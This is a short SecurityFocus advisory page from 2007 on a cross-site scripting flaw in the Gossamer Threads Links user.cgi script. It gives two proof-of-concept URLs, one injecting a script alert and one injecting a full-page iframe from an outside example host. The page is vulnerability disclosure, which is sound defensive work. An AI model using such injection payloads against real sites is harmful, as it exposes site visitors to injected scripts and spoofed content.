Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

Gossamer Threads Links User.CGI Cross-Site Scripting Vulnerability

No exploit is required.

The following proof of concept examples are available:
http://www.example.com/user.cgi?url=">&lt;script&gt;alert("XSS Vulnerability")&lt;/script&gt;<"&from=rate
http://www.example.com/user.cgi?url="><iframe%20src="http://www.example2.com/linksql.html"%20scrolling="No"%20align="MIDDLE"%20width="100%"%20height
+="3000"%20frameborder="No"></iframe><!--&from=rate







 

Privacy Statement
Copyright 2007, SecurityFocus